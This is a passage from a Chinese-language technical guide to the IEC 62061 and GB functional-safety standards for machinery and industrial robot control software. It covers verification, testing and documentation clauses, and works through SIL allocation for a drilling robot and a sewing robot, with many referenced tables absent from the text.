Reproduction,delivery C.5.1 Executable code production Any option or change in the generation,during the software production should be recorded (e.g.in the version sheet) so that it is possible to say how and when the software was generated. 【GB标准条款】 C.5 复制、传播 C.5.1 可执行代码产生 软件产生期间,任何选项或更改需记录(如在版本表中)。这样就可能说明软件是什么时间生成的,怎样生成的。 1. 条款目的与意图 条款C.5规定了安全相关机械/工业机器人控制系统软件复制及传播过程中的注意事项。其中,条款C.5.1 规定了安全相关机械/工业机器人控制系统软件可执行代码产生过程中的注意事项。 2. 条款解释与示例 代码的编译选项会影响代码的特性,最显而易见的就是编译优化选项。编译优化选项的改变,对功能安全特性的影响是难以评估的。所以条款指出要把代码编译时的选项和配置记录下来。这里用的编译优化选项,应该和软件通过测试验证时所采用的选项和配置保持一致。经过功能安全测试验证,在至少保证当前编译优化选项和配置的前提下,功能安全风险是可控的。 7.5.2 软件安装 【IEC标准条款】 C.5.2 Software installation and exploitation All failures linked to safety-related control functions brought to the attention of the designer of the system should be recorded and analysed. NOTE This means that the designer is aware of any safety-related failures that are communicated to him and that he takes the appropriate action (e.g.warning other users,software modification,etc.). 【GB标准条款】 C.5.2 软件安装和开发 引起系统设计人员注意的与安全相关控制功能有关的所有失效应记录和分析。 注:这说明设计人员知道传达给他的任何安全相关失效,并采取适当行动(如对其他用户提出告警、软件修改等)。 1. 条款目的与意图 条款C.5.2规定了安全相关机械/工业机器人控制系统软件的安装与开发要求。 2. 条款解释与示例 条款C.5.2指出要记录和分析值得注意的失效和与安全相关控制功能有关的失效。因此在测试阶段,测试人员要和开发人员进行充分有效的沟通,让开发人员及时获悉软件存在的缺陷。而在软件已经发布的情况下,应该及时通过客户获悉软件的失效情况。这说明,功能安全要求高的软件产品,要具备失效记录的能力,并要做好产品的用户跟踪工作。 7.6 软件验证和确认 【IEC标准条款】 C.6 Software verification and validation The purpose of verification activities is to demonstrate that software elements stemming from a given phase of the development cycle conform to the specifications established during the previous phases and to any applicable standards or rules.They also serve as a means of detecting and accounting for any errors that might have been introduced during software development. Software verification is not simply a series of tests,even though this is the predominant activity for the relatively small software element considered in this Annex.Other activities such as reviews and analyses,whether associated with these tests or not,are also considered to be verification activities.In certain cases,they can replace some tests (e.g.in the event that a test cannot be carried out because it would cause deterioration of a hardware component). 【GB标准条款】 C.6 软件验证和确认 验证活动的目的是证实来自开发周期特定阶段的软件元素符合先前阶段制定的规范和任何可应用的标准或规则。验证活动也作为检测手段和说明在软件开发过程中可能引入的任何错误。 软件验证不仅仅是一系列简单的测试,尽管这是本附录中所考虑的相对小型的软件元素的主要活动。其他活动(如审查和分析)不管是否与这些测试有关,也被认为是验证活动。在某些情况下,它们可以代替一些测试(例如测试不能进行的情况,因为测试可能导致硬件损坏)。 1. 条款目的与意图 条款C.6规定了安全相关机械/工业机器人控制系统软件在验证和确认环节的措施要求。 2. 条款解释与示例 条款C.6强调了验证活动的目的和手段。因为附录C是以小型软件为说明对象的,所以测试是软件验证的主要活动。而对于一般的功能安全相关软件,审查、分析是必不可少的。 7.7 基本的验证和确认的指引 【IEC标准条款】 C.7 General verification and validation guidelines The analyst should be able to carry out the evaluation of software conformity by conducting any audits or expertise deemed useful during the different software development phases. All technical aspects of software lifecycle processes are subject to evaluation by the analyst.The analyst should be allowed to consult all verification reports (tests,analyses,etc.) and all technical documents used during software development. NOTE1 The intervention of the analyst at the specification phase is preferable to an a posteriori intervention since it should limit the impact of any decisions made.On the other hand,financial and human aspects of the project are not subject to evaluation. NOTE2 It is in the interest of the applicant to provide satisfactory evidence of all activities carried out during software development. NOTE3 The analyst should have all the necessary elements at his or her disposal in order to formulate an opinion. Evaluation of software conformity is performed for a specific,referenced software version.Any modification of previously evaluated software that has received a final opinion from the analyst should be pointed out to the latter so that any additional evaluation activities can be carried out to update this opinion. NOTE4 Any modification can modify software behaviour;the evaluation performed by the analyst can therefore only be applied to a precise software version. 【GB标准条款】 C.7 验证和确认总则 在软件开发的不同阶段,分析人员应该通过实施审查或专门技能认定来评估软件的一致性。 软件生命周期中的所有技术方面都要经过分析人员的评估。应允许分析人员查阅软件开发期间使用的所有验证报告(测试、分析等)和所有技术文件。 注1:分析人员在规范阶段的介入优于后期介入,因为应该限制任何决定所产生的影响。另外,项目的财务和人力方面不需要评估。 注2:提供软件开发过程中所有活动的令人满意的证据,对申请人是有利的。 注3:分析人员应该在处理中包含所有的必要元素,以便明确地表述观点。 软件一致性的评估是对具体的、可参考的软件版本进行的。对以前评估的软件的任何修改,如果已得到了分析人员的最终意见则应向该分析人员指出,以便进行任何补充的评估活动来更新该意见。 注4:任何修改都可能更改软件行为,因此分析人员进行的评估只适用于准确的软件版本。 1. 条款目的与意图 条款C.7规定了验证和确认总则,指导质量人员对安全相关机械/工业机器人控制系统软件开展与质量保障有关的活动。 2. 条款解释与示例 条款C.7指出,在软件开发的不同阶段,分析人员应通过实施审查或专门技能认定来评估软件的一致性。这意味着软件开发的组织要配备专门的分析人员或者质量人员对软件进行验证和评估。 而对于条款C.7中指出的软件生命周期的所有技术内容,都要经过分析人员的评估,通常依据相关国家标准或行业标准、产品的需求规格说明及功能安全说明等。 条款C.7指出,应允许分析人员查阅所有验证报告(测试、分析等)和在软件开发期间使用的所有技术文件。软件开发组织要建立对应的分析审查制度,授予分析人员充分的权限,并要求相关人员配合分析和审查工作。 需要注意:第一,软件开发组织应该让分析人员尽早介入,在项目前期就开展质量分析活动;第二,软件开发组织要注重信息收集和保证记录完整、清晰、翔实;第三,分析人员应该充分审查各种项目元素,保证分析结果的充分、完整。 经过评估的以前版本软件,可以作为现阶段评估软件的参考,以便提高评估效率。当然以前版本的修改意见得到分析人员的认可,是其具备参考价值与否的关键。 另外,还需要注意,任何对软件的修改都有可能影响软件的功能安全完整性,分析人员进行的评估只适用于准确的软件版本。这要求在软件发布前先进行评估,如果软件需要更新,则要再次进行评估后才能发布。 7.8 验证和确认的复审 【IEC标准条款】 C.8 Verification and validation review Analysis activities and software design verification should verify the conformity to specifications. NOTE1 The purpose is to ensure that the software specification and design (both detailed and preliminary) are coherent. An external validation review (with the analyst) should be held at the end of the validation phase. NOTE2 This can be used to ascertain whether or not the element satisfies the specifications. The result of each review should be documented and archived.It should include a list of allactions decided on in the review process,and the review conclusion (decision on whether or not to move on to the next activity).The activities defined in the review should be monitored and treated. 【GB标准条款】 C.8 验证和确认复审 分析活动和软件设计验证应核实并符合规范。 注1:目的是确保软件规格和设计(详细设计和初步设计)的一致性。 外部确认复审(由分析人员执行)应在确认阶段结束时进行。 注2:可用于确定元素是否符合规范。 复审结果应形成文件并归档,包括复审过程中确定的所有活动的列表,以及复审结论(决定是否进行下次活动)。复审中所规定的活动应进行监控和处理。 1. 条款目的与意图 条款C.8讲述的是验证和确认的复审,指导质量人员对安全相关机械/工业机器人控制系统软件的验证和确认进行必要的复审。 2. 条款解释与示例 条款指出,软件开发组织要组织分析活动和软件设计验证,核实软件产品符合规范(需求规格说明)。具体的方法主要是进行评审和测试。 开展分析活动和软件设计验证的目的是确保软件规格和设计(详细设计和初步设计)的一致性。 外部确认复审(由分析人员执行)应在确认阶段结束时进行,由此可以认为这里指的是验收活动,可以用来确认软件产品的各个要素是否符合规范要求。 复审结果应形成文件并归档。归档材料中应记录复审过程中确定的所有活动列表,以及复审结论(决定是否进行下一阶段的活动,或者进行修改并重新提交复审)。复审中所规定的活动应进行监控和处理。 7.9 软件测试 7.9.1 常规确认 【IEC标准条款】 C.9 Software testing C.9.1 General validation Before writing the first test sheets,it is important to establish a test strategy in a test plan.This strategy indicates the approach adopted,the objectives that have been set in terms of test coverage,the environments and specific techniques used,the success criteria to be applied,etc.. The test objectives should be adapted to the type of software,and to the specific factors.These criteria determine the types of test to be undertaken-functional tests,limit tests,out of limit tests,performance tests,load tests,external equipment failure tests,configuration tests-as well as the range of objects to be covered by the tests (functional mode tests,safety-related control function tests,tests of each element in the specification,etc.). Verification of a new software version should include non-regression tests. NOTE Non-regression tests are used to ensure that the modifications performed on the software have not modified the behaviour of the software in any unexpected way. 【GB标准条款】 C.9 软件测试 C.9.1 一般确认 在填写第一张测试表前,在测试计划中建立测试策略是非常重要的。该策略应指出采取的方法、根据测试覆盖范围设定的目标、使用的环境和具体技术、应用的成功准则等。 测试目的应符合软件的类型和具体因素。准则决定承担的测试类型——功能测试、限制测试、非限制测试、性能测试、负载测试、外部设备失效测试、配置测试以及由测试覆盖的目标范围(功能模块测试、安全相关控制功能测试、规范中各元素测试)等。 新软件版本的验证应包括非回归测试。 注:非回归测试用于确保对软件的修改没有以任何意外方式修改软件的行为。 1. 条款目的与意图 条款C.9讲述的是安全相关机械/工业机器人控制系统软件在软件测试方面的指导措施。其中条款C.9.1讲述了常规确认的操作措施。 2. 条款解释与示例 条款指出,执行测试活动之前要编制测试计划。在软件测试领域,通常将其称作测试计划。根据软件测试的相关标准,测试计划包含测试策略的内容。测试策略主要就是测试采用哪些测试类型(功能测试、性能测试、安全性测试、边界测试等)和哪些测试方法(代码走查、工具分析、动态测试、软件仿真等)。根据测试覆盖范围设定的目标,描述使用的测试环境、工具和具体技术,明确测试通过准则等。 条款指出,测试目的应符合软件的类型和具体因素。准则决定承担的测试类型——功能测试、限制测试、非限制测试、性能测试、负载测试、外部设备失效测试、配置测试以及由测试覆盖的目标范围(功能模块测试、安全相关控制功能测试、规范中各元素测试)等。简而言之,在测试计划中要描述测试活动的具体内容,在软件测试领域,称之为测试项。测试项是在测试覆盖的范围内,测试活动根据要求细化地针对不同关注点的测试描述,一般会包含输入的方法、采用的工具、观察哪个输出信息、判断通过与否的准则等信息。 条款指出,新软件版本的验证应包括非回归测试,用于确保对软件的修改没有以任何意外方式修改软件的行为。非回归测试是指对新增功能或修改的模块进行测试验证。与之对应,回归测试是确认对软件的修改或新增功能没有对原有的其他功能产生影响的测试验证。在国内,这两部分通常合并在一起统称为回归测试。在国外,回归测试不关心新增的功能是否正确或者软件的缺陷是否真正被修复。读者在使用本条款的时候,应注意区分。 7.9.2 软件规格验证之确认测试 【IEC标准条款】 C.9.2 Software specification verification:validation tests The purpose of these verifications is to detect errors associated with the software in the target system environment.Errors detected by this type of verification include:any incorrect mechanism to treat interruptions,insufficient respect of running time requirements,incorrect response from the software operating in transient mode (start-up,input flow,switching in a degraded mode,etc.),conflicts of access to different resources or organizational problems in the memory,inability of integrated tests to detect faults,software/hardware interface errors,stack overflows.Validation tests are the principal component of software specification verification. The test coverage should be made explicit in a traceability matrix and ensure that: -each element of the specification,including safety mechanisms,is covered by a validation test;and -the real-time behaviour of the software in any operational mode can be verified. Furthermore,the validation should be carried out in conditions representative of the operational conditions of the SRECS or the SRECS subsystem. NOTE1 This guarantees that the software reacts as expected in operation.It applies only to cases where the test conditions can be destructive for hardware (e.g.physical fault of a component that cannot be simulated).To be significant,validation should be performed in the operational conditions of the SRECS or SRECS subsystem (i.e.with the final versions of software and hardware,and the software installed in the target system).Any other combination could decrease the efficiency of the test and require analysis of its representation. Validation results should be recorded in a validation report that should cover at least the following points: -the versions of software and system that were validated; -a description of the validation tests performed (inputs,outputs,testing procedures); -the tools and equipment used to validate or evaluate the results; -the results showing whether each validation test was a success or failure; -a validation assessment:identified non-conformities,impact on safety,decision as to whether or not to accept the validation. A validation report should be made available for each delivered software version and should correspond to the final version of each delivered software element. NOTE2 This report can be used to provide proof that tests were indeed carried out,and that the results were correct (or contained explainable deviations).It can also be used to redo testsat a later date,for a future software version or for another project.It provides a guarantee that each delivered version has been validated in its final form.On the other hand,it does not impose a complete validation of each modification of an existing code-an impact analysis can,in certain cases,justify partial validation. 【GB标准条款】 C.9.2 软件规格验证:确认测试 这些验证的目的是在目标系统环境中检测与软件有关的错误。该类型验证检测到的错误包括:处理中断的各种错误机制,对运行时间要求的不足,在瞬变模式(启动、输入流、降级模式中的切换等)中软件运行的错误响应,存储器中不同资源的访问冲突或存在组织问题,集成测试不能检测故障,软件/硬件接口错误和堆栈溢出等。确认测试是软件规格验证的主要组成部分。 测试的覆盖范围应以可追溯矩阵详述并确保: ——确认测试覆盖规范的各元素,包括安全机制; ——可验证任何操作模式下的软件实时行为。 此外,确认应在代表SRECS或SRECS子系统运行条件的条件下进行。 注1:保证软件在运行中如预期般反应。它只适用于测试条件可能破坏硬件的情况(例如不能模拟部件的物理故障)。重要的是,确认应在SRECS或SRECS子系统的运行条件下进行(使用软件和硬件的最终版本并安装在目标系统上)。任何其他组合都可能会降低测试效率并需要对其表示进行分析。 确认结果应记录在确认报告中,至少包括下列方面: ——所确认的软件和系统版本; ——执行确认测试的描述(输入、输出、测试程序); ——用于确认或评估结果的工具和设备; ——各确认测试是否成功地显示结果; ——确认评价:确定的不符合项,对安全的影响,是否接受确认的决定。 确认报告应适用于各已交付的软件版本,并应与各交付软件元素的最终版本一致。 注2:此报告可用于提供测试确实已执行的证明,并且结果是正确的(或包含可解释的偏离)。以后,对于未来的软件版本或其他项目,也可用于重做测试。其保证各交付的版本按最终形式确认。另外,它不强求对现有代码的每次修改进行完整确认,在某些情况下,影响分析可以证明部分确认。 1. 条款目的与意图 条款C.9.2讲述了在软件规格验证过程中,确认测试的实施步骤及相关措施。 2. 条款解释与示例 条款较详细地描述了确认测试的要求,列举了一些常见的错误。其中比较关键的一点是建立可追溯矩阵,详细描述测试范围。在软件测试领域,采用双向追踪的方式建立追溯矩阵:正向追踪是从测试需要覆盖的范围到测试项的追溯;逆向追踪是测试项到需要覆盖的范围进行追踪。前者保证每个关注点都能够被覆盖;后者能让人清晰了解每个测试项的来源。 条款指出,确认报告应适用于各已交付的软件版本,应与各交付软件元素的最终版本一致,表明确认报告要与软件版本一一对应。如果交付的软件产品是由多个软件元素组成的,那么允许各个软件元素分别出具确认报告,版本要与最终交付的保持一致。 7.9.3 软件规格验证之软件集成测试 【IEC标准条款】 C.9.3 Software design verification:software integration tests This verification focuses on the correct assembly of software modules and on the mutual relationships between software components.It can be used to reveal errors of the following kind:incorrect initialization of variables and constants,errors in the transfer of parameters,any data alteration,especially global data,incorrect sequencing of events and operations. Software integration tests should be able to verify: -correct sequencing of the software execution; -exchange of data between modules; -respect of the performance criteria; -non-alteration of global data. The test coverage should be given explicitly in a traceability matrix demonstrating the correspondence between the tests to be undertaken and the objectives of the tests defined. Integration test results should be recorded in a software integration test report,which should,as a minimum,contain the following points: -the version of the integrated software; -a description of the tests performed (inputs,outputs,procedures); -the integration tests results and their evaluation. 【GB标准条款】 C.9.3 软件设计验证:软件集成测试 该验证注重软件模块的正确组装和软件部件间的相互关系,可以用于暴露下列类型的错误: 变数和常数的不正确初始化,参数传递错误,数据变更(特别是全局数据),事件和操作的不正确排序。 软件集成测试应能验证: ——软件执行的正确排序; ——模块间的数据交换; ——对实施标准的遵守; ——全局数据的不变更。 测试覆盖范围应以可追溯矩阵明确表示,证明承担的测试和规定的测试目标之间的一致性。 集成测试结果应记录在软件集成测试报告中,其中至少应包括下列方面: ——集成软件的版本; ——所执行测试的描述(输入、输出、程序); ——集成测试结果及其评估。 1. 条款目的与意图 条款C.9.3讲述了在软件设计验证过程中,软件集成测试的实施步骤及相关措施。 2. 条款解释与示例 条款列举了集成测试可以发现的软件缺陷及测试报告需要记录的内容。通常,把单个函数称作单元。测试单个函数的功能是否正确,称为单元测试。而测试函数之间的相互调用,则称为集成测试。对两个存在调用关系的函数进行测试,则形成了最简单的集成测试。函数调用一般会有很多层,因此集成测试可以有不同层次。集成测试具有自顶向下和自底向上的集成方式。自顶向下集成方式,是从顶层函数开始,逐步将其调用的函数从桩函数替换为真实函数的过程。而自底向上集成方式,则是先测试未调用其他函数的函数,然后测试仅调用已测毕函数的函数,逐步完成集成的过程。 7.9.4 软件规格验证之模块测试 【IEC标准条款】 C.9.4 Detailed design verification:module tests Module tests focus on software modules and their conformity with the detailed design.This activity can be indispensable for large and complex software elements,but is only recommended for the relatively small software elements dealt with here.This phase of the verification procedure allows detection of the following types of errors: -inability of an algorithm to satisfy software specifications; -incorrect loop operations; -incorrect logical decisions; -inability to compute valid combinations of input data correctly; -incorrect responses to missed or altered input data; -violation of array boundaries; -incorrect calculation sequences; -inadequate precision; -accuracy or performance of an algorithm. Each software module should be submitted to a series of tests to verify,using input data,that the module fulfils the functions specified at the detailed design stage. The test coverage should be provided in a traceability matrix that demonstrates the correspondence between the test results and the objectives of the tests defined. 【GB标准条款】 C.9.4 详细设计验证:模块测试 模块测试注重软件模块与详细设计的一致性。对于大型复杂软件元素,该验证活动可能是不可缺少的,但是对于这里所述的小型软件元素该验证活动只是建议。该阶段的验证程序允许检测出下列错误: ——不能产生符合软件规范的算法; ——错误循环运行; ——错误的逻辑决策; ——不能正确运算输入数据的有效组合; ——对缺失或变更的输入数据的错误响应; ——阵列界线破坏; ——计算顺序错误; ——精度不够; ——算法的准确性或性能不足。 采用输入数据,对各软件模块实施一系列测试以检验模块是否满足在详细设计阶段所规定的功能。 本测试覆盖范围应由可追溯矩阵提供,以证明测试结果与规定的目标一致。 1. 条款目的与意图 条款C.9.4讲述了在详细设计验证过程中,模块测试的实施步骤及相关措施。 2. 条款解释与示例 前一节提到,对单个函数进行测试称为单元测试,而单元测试也称为模块测试。在单元测试中,对函数内部调用的其他函数通过插桩方式模拟其返回结果。对于复杂软件,单元测试是不能缺少的。但是由于复杂软件的函数数量十分庞大,不可能集中进行测试。因此,开发人员一般在完成单个函数的开发之后,马上自行进行单元测试,以尽早暴露软件缺陷。 7.10 软件的文件编制 【IEC标准条款】 10 Documentation 10.1 The documentation shall: -be accurate and concise; -be easy to understand by those persons having to make use of it; -suit the purpose for which it is intended; -be accessible and maintainable. 10.2 The designer of the SRECS should distinguish between the documentation that isrelevant to the user and that which is relevant to its design and construction. 10.3 The documents shall have titles or names indicating the scope of the contents. 10.4 The documents shall have a revision index (version numbers) to make it possible to identify different versions of the document. NOTE See also IEC 82045-1:2001 for further information on methods that can be used for the management of documentation. 10.5 Table 8 summarizes the information and documentation to be available,where appropriate. Table 8-Information and documentation of a SRECS Information required Subclause 【GB标准条款】 10 文件 10.1 文件应: ——精确和简明; ——让使用的人容易理解; ——符合预期目的; ——易于访问和维护。 10.2 SRECS的设计者应区别用户相关的文件与设计和开发相关的文件。 10.3 文件应该有标题或名称,并指明内容范围。 10.4 文件应有修订索引(版本号),能够区别文件的不同版本。 注:有关文件管理所使用方法的进一步信息,参见IEC 82045-1:2001。 10.5 表8对可用信息及文件进行了总结。 表8 SRECS的信息和文件 续表 1. 条款目的与意图 条款10简要指出了SRECS的文件编制要求。 2. 条款解释与示例 安全相关机械/工业机器人控制系统软件的文件应该满足以下基本要求: ·精确和简明; ·让使用的人容易理解; ·符合预期目的; ·易于访问和维护。 SRECS的设计者应区别用户相关文件与设计和项目开发相关文件。 文件应该有标题或名称,标题或名称中应指明内容范围。 文件应有修订索引(版本号),用于区别文件的不同版本。 有关文件管理所使用方法的进一步信息,可参考IEC 82045-1:2001中的相关内容。 表7-1对标准规定的文件要求进行了汇总。 表7-1 标准规定的文件要求汇总 续表 第8章 标准在安全相关机械/工业机器人控制系统中的应用 IEC 62061标准是专门用于机械工业的安全标准。本章将结合作者在功能安全方面的实践经验,循着标准脉络,以具体例子演示和说明该标准在机械/工业机器人领域的应用方法和实现思路。 8.1 设计和实现符合IEC 62061标准的安全控制器 8.1.1 概述 安全相关电气控制系统除实现包括信息采集、评估、决策、执行等在内的功能外,关键是实现符合标准要求的安全防护功能。例如,用于木材加工的钻孔机器人的控制系统功能(包括安全防护)如表8-1所示。 表8-1 用于木材加工的钻孔机器人的控制系统功能 该控制系统使用可编程逻辑控制器(PLC)控制机械臂执行标准功能和安全功能,本节只描述安全防护功能如何依据IEC 62061标准实现,最终实现SRECS。 8.1.2 标准应用 根据本书之前的内容,在应用IEC 62061标准时,分几个独立的阶段执行特定的工作,以满足相关要求,如表8-2所示。 表8-2 IEC 62061标准应用的阶段划分 注:表中阶段1~7的重点是文档的编制。 1. 建立安全计划 IEC 62061规定了在实现安全系统时应遵循的一种系统性步骤,包括从被控对象的风险分析和风险评估到SRECS的设计、实现及验证等一系列活动的记录文档,该套文档的组合称为安全计划。安全计划的一个明显特征就是必须随着每一阶段活动的执行不断更新,以反映系统构建的真实情况。根据前文提到的标准要求,安全计划应包括:①实现SRECS的所有相关活动的计划和步骤;②说明如何实现功能安全;③执行和审核所有活动的责任分配计划;④说明所有活动执行和复审的规则;⑤说明配置管理过程;⑥验证计划;⑦确认计划。 因此,在本实例中,安全计划包括应执行的活动(见表8-3)和职责分配(见表8-4)。 ▼表8-3 安全计划中应执行的活动 续表 ▼表8-4 安全计划职责分配 2. 风险分析 风险分析结果是设计安全相关控制系统的根本依据,风险分析主要确定以下内容:①在用该设备时究竟有何种风险;②为降低风险需要何种安全相关控制功能。 在本实例中,风险分析的结果:①存在一个潜在的危险,即当机械臂和操作员发生碰撞时,如果系统不停转,则有可能伤到操作员;②有必要为该风险设置一个SRCF,即停止刀具旋转。因此,对钻孔机器人的风险分析结果如表8-5所示。 表8-5 对钻孔机器人的风险分析结果 3. 风险评估 基于风险分析的结果,对系统标识的风险进行评估。IEC 62061的附录A中提供了一种方法可以确定SRCF的安全完整性等级SIL。风险评估的目标是把剩余风险发生率降低到可以接受的程度。 钻孔机器人伤害发生概率受下列3个因素影响:①被保护对象处于危险区域的频率和时长;②危险事件发生的概率;③避免或减少伤害发生的概率。 在IEC 62061中规定了下列4项参数,用于确定风险的大小:①伤害严重程度,Se;②暴露在危险中的频率和持续时间,Fr;③危险事件发生概率,Pr;④避免或限制伤害发生的概率,Av。 1)风险分析中相关参数的确定 (1)伤害严重程度。 由于操作员接触旋转的刀具时有可能造成断肢等永久性伤害,因此碰撞危险源的伤害严重程度的Se值为4,如表8-6所示。 表8-6 碰撞危险源的伤害严重程度 (2)人暴露在危险中的频率和持续时间。 本实例使用标准中表A.2暴露的量化值进行分析:操作员必须与机械臂协同工作,长期暴露在危险区域,因此进入并停留在危险区域活动对应的Fr值应为5,如表8-7所示。 表8-7 操作员在危险区域活动对应的Fr值 (3)危险事件发生概率。 本实例用标准中表A.3评估危险事件发生的概率。由于发生碰撞时,操作员接触到刀具的可能性很高,因此按危险事件发生的概率等级,该危险源的危险事件发生概率对应的Pr值为5,如表8-8所示。 表8-8 危险事件发生概率对应的Pr值 (4)避免或限制伤害发生的概率。 本实例用标准中的表A.4评估操作员是否可以避免受到伤害。由于在协同工作而刀具不停止的情况下,操作员几乎不可能避免受到伤害,因此该情形下避免或限制伤害发生的概率对应的Av值为3,如表8-9所示。 表8-9 避免或限制伤害发生的概率对应的Av值 2)分配SRCF的安全完整性等级(SIL) 确定了影响因素Se、Fr、Pr和Av后,按照标准中表A.5、表A.6评估出的风险大小确定所需的SIL。SRCF的SIL与可能的伤害严重程度(Se=4)和伤害概率级别Cl(Cl=Fr+Pr+Av=13)相对应,因此该危险源所需的安全完整性等级应为SIL3,如表8-10所示。 表8-10 确定SIL 因此,SRCF所需的安全完整性等级是SIL3。 4. 编写SRCF规范 SRCF规范即安全需求规格书,编写时以风险和危险分析为依据,是安全仪表系统设计与实现的接口。本实例的SRCF的安全需求规格书如表8-11所示。 表8-11 SRCF的安全需求规格书 5. 设计SRECS结构 编写好安全相关控制功能(SRCF)的安全需求规格书之后,现在可以设计SRECS的结构了。结构设计的目的是将整个SRCF分解成多个功能块,并分配给各个子系统,上述子系统协同工作组成了SRECS。将本实例系统分解成3个子系统。所有3个子功能都需要执行SRCF,如果一个子功能故障,则整个SRCF失效,如图8-1和表8-12所示。 ▲图8-1 安全相关控制功能划分 ▼表8-12 安全相关控制功能划分列表 注意:每个子功能至少符合SIL3。 将子功能分配到子系统,系统功能块与子系统的对应关系如表8-13所示。 表8-13 系统功能块与子系统的对应关系 因此,可以画出SRECS的结构设计图如图8-2所示。 图8-2 SRECS的结构设计图 6. 子系统的实现 完成SRECS的系统结构设计之后,现在开始实现SRECS的子系统。整个系统由3个子系统构成;子系统1由两个相同的加速度传感器构成;子系统2通过PLC实现;子系统3由两个相同的继电器构成。子系统软/硬件概况如图8-3所示。 图8-3 子系统软/硬件概况 子系统及其功能描述如表8-14所示。 表8-14 子系统及其功能描述 本实例主要介绍子系统1的实现,子系统2和子系统3的实现步骤与子系统1的类似,这里不再赘述。由于本书关注的是系统软件的功能安全实现,其元器件的失效概率由制造商决定,并且不讨论短路和断线的影响。 子系统1包含两个相同的子系统元件(加速度传感器)。两个子系统元件均连接到一个F-DI。两个元件均在F-CPU中评估。F-DI和F-CPU采用西门子功能安全型PLC实现,具体可查西门子功能安全型PLC的用户手册。 (1)子系统元件1.1和1.2的描述。 加速度传感器用在两个子系统元件中(见表8-15)。 (2)将子系统1的元件连接到子系统2上。 两个子系统元件连接到一个F-DI(故障安全型数字量输入模块),其中每个子元件占用一个通道,并通过F-DI获取电源。 表8-15 子系统元件(示例) 设定F-DI的参数:1为通道传感器互联;F为模块的监视时间。同时,设定短路测试,循环测试每个通道。 (3)子系统1的诊断。 如果监视结束后两个加速度传感器的差值超过一定范围,则会引发故障。故障包括传感器接线故障、内部故障。子系统2的F-CPU发挥诊断作用。 7. 确定SIL 为了确定SRECS整体满足SIL要求,应对以下内容进行确认: ·每一个SRECS子系统都应满足SRCF整体的SIL要求; ·各SRECS子系统PFHD和不应超过SRCF整体SIL要求的对应值。 为了复查基于SIL的要求,需要执行下列步骤:①确定SRECS所有子系统的最小SILCL;②确定PFHD;③得出由SRECS实现的SIL。 各子系统的PFHD汇总及全系统的SIL确定分别如表8-16、表8-17所示。 PFHD(SRECS)=PFHD(SS1)+PFHD(SS2)+PFHD(SS3)=2.641×10-9 ▼表8-16 各子系统的PFHD汇总 ▼表8-17 全系统的SIL确定 8. 实现SRECS(阶段8~12) 在阶段7中检查了前面设计的SRECS是否满足实际需求,若满足则可实现SRECS。阶段8~12针对的是标准要求,需采取适当的措施来满足这些要求。 1)硬件实现 必须按照文档中规定的SRECS的设计来购置和集成硬件,实现安全相关系统。 2)软件说明 在应用中,SRCF需要应用软件实现。而应用软件由子系统2的F-CPU执行。按照标准要求,必须为该应用软件编写说明。 3)设计和开发软件 设计和开发软件依据IEC 61058的要求执行。 4)集成与测试 必须按照标准要求把SRECS集成到大系统上,而且需进行完备的测试,通过测试检查所有子系统和子系统元件,包括应用软件之间的交互逻辑是否正确。 5)安装 安装完成后,可以对SRECS进行验证。 8.2 复杂机器人控制软件系统的功能安全验证实践 8.2.1 概述 在机器人控制系统中,通信模块需要不断地检测和接收从底层读取的各开关量信号,上位机控制软件发送控制命令需要通过串口或其他接口,在自动状态时通信模块也需要不断地检测通信端口是否有数据,还要完成机器人的各种功能。因此,机器人控制系统需要设计为基于多线程的复杂软件系统。 以往,在证明软件系统是否符合功能安全标准时,主要依靠穷举测试法。这种方法对于简单的确定性单线程系统足够了,但无法胜任对多线程系统的验证。本节以一款缝纫机器人的失效模式分析、风险评估、软件开发活动完整性验证为例,介绍复杂机器人控制软件系统的功能安全验证。 8.2.2 验证实践 下面分别从失效模式分析、风险评估及软件开发活动完整性验证方面介绍符合相应安全完整性等级要求的功能安全验证。 1. 失效模式分析 失效模式分析将通过建立故障模式表和系统故障树来进行。 在分析故障模式时,我们通常根据系统的组成结构图分析各组成模块的故障模式。本次分析参考机械/工业机器人使用维护及故障排除等运行安全性经验和通用部件在其他设备上各种工况下的常见故障模式,给出一个缝纫机器人系统各分系统的主要故障模式。其中,本体故障模式如表8-18所示,控制系统故障模式如表8-19所示,缝纫系统故障模式如表8-20所示,驱动系统故障模式如表8-21所示。 ▼表8-18 本体故障模式 ▼表8-19 控制系统故障模式 ▼表8-20 缝纫系统故障模式 ▼表8-21 驱动系统故障模式 上述各表为FMEA(失效模式与影响分析)中的故障模式分析,故障模式的定性分析可以作为缝纫机器人系统功能安全测试与验证的依据。 缝纫机器人系统故障树是在外磁场场强稳定、外电源系统供电稳定、无人为工作失误的条件下建立的。对缝纫机器人系统进行详细的结构分解,并对各分系统进行FMEA,建立系统故障树如图8-4所示(除本体故障外)。 2. 风险评估 根据标准要求,风险评估应根据伤害严重程度、危险事件发生概率等风险参数来进行评估。 伤害严重程度通过可挽回的伤害、不可挽回的伤害和死亡来进行评估。使用缝纫机器人的伤害严重程度(Se)等级如表8-22所示。其中,Se=4代表伤害致命或严重,伤者在康复后难以进行相同的工作(即使有也极少);Se=3代表伤害严重,伤者在康复后存在可以继续从事相同工作的可能性;Se=2代表伤害可以挽回但需要专业医疗护理,包括严重的破口、刺伤及严重的撞伤;Se=1代表伤害较小但需要急救护理,包括擦伤和较轻的撞伤。 ▲图8-4 系统故障树 ▼表8-22 使用缝纫机器人的伤害严重程度(Se)等级 伤害发生概率由操作员暴露在危险中的频率和持续时间、危险事件发生概率及避免或限制伤害发生的概率共同决定。 使用缝纫机器人时,操作员暴露在危险中的频率和持续时间(Fr)等级如表8-23所示。 表8-23 操作员暴露在危险中的频率和持续时间(Fr)等级 需要注意的是,当持续时间短于10min时,Fr可能会降到下一个等级,但这并不适用于暴露频率≥1 次/时的情况,因为当暴露频率足够高(大于或等于1次/时)的时候,任何持续时间都意味着危险。 使用缝纫机器人的危险事件发生概率(Pr)等级如表8-24所示。 表8-24 使用缝纫机器人的危险事件发生概率(Pr)等级 使用缝纫机器人的避免或限制伤害发生的概率(Av)等级如表8-25所示。 表8-25 使用缝纫机器人的避免或限制伤害发生的概率(Av)等级 对于每一种危险,决定伤害概率级别的参数Cl=Fr+Pr+Av,通过如表8-26所示的缝纫机器人SIL分配矩阵表即可获得确定的SIL等级。 表8-26 缝纫机器人SIL分配矩阵表 在表8-26中,可明确需采取的与Se、Cl对应的安全完整性等级措施。需要注意的是,表中OM表示建议使用其他措施。 